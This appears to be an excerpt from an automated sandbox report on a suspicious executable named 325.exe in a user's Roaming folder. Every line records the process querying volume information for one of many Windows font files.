Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
